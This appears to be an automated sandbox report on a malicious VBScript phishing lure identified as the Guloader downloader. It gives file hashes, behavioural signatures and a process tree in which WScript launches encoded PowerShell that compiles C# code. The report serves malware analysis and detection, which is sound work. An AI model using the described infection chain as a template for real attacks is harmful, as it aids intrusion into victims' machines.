Analysis

  • max time kernel
    90s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    26-09-2022 03:00

General

  • Target

    SOLICITUD DE OFERTA.vbs

  • Size

    181KB

  • MD5

    06acdf5de8b3b26b96a9147836decc49

  • SHA1

    c7e68cbbe9a5ec40e10a2013512c24e768b0c53a

  • SHA256

    12dd0148f02ed0a257b41784311a98b98db4a501f8f94a2b65c5a9bc3cd10451

  • SHA512

    c7fcd25d4e87eaba6996fa07e400d426a36ca07e4e9e723f3e03bd60c0bffd3ca9bfaf1e2eeae49cf0dff85eca0c19b66b0a1904099515478725343a79315cef

  • SSDEEP

    3072:Fmi1FFbPmgq17iT1Kd5nTuZ6RlZ36CsBFX0FevM8K4Ec5CsW:Fh5rmgqKYn6ZWZ36CsBFXAe3EcwB

Score
10/10

Malware Config

Signatures

  • Guloader, Cloudeye

    A shellcode-based downloader first seen in 2020.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SOLICITUD DE OFERTA.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3208
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -e "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"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4584
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\32cqbg5h\32cqbg5h.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2448
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES96F5.tmp" "c:\Users\Admin\AppData\Local\Temp\32cqbg5h\CSC14330FB2F81748809BA2D6578EEF2C1.TMP"
          4⤵
            PID:4704

    Network

    MITRE ATT&CK Enterprise v6

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\32cqbg5h\32cqbg5h.dll

      Filesize

      4KB

    • C:\Users\Admin\AppData\Local\Temp\RES96F5.tmp

      Filesize

      1KB

    • \??\c:\Users\Admin\AppData\Local\Temp\32cqbg5h\32cqbg5h.0.cs

      Filesize

      1KB

    • \??\c:\Users\Admin\AppData\Local\Temp\32cqbg5h\32cqbg5h.cmdline

      Filesize

      369B

    • \??\c:\Users\Admin\AppData\Local\Temp\32cqbg5h\CSC14330FB2F81748809BA2D6578EEF2C1.TMP

      Filesize

      652B
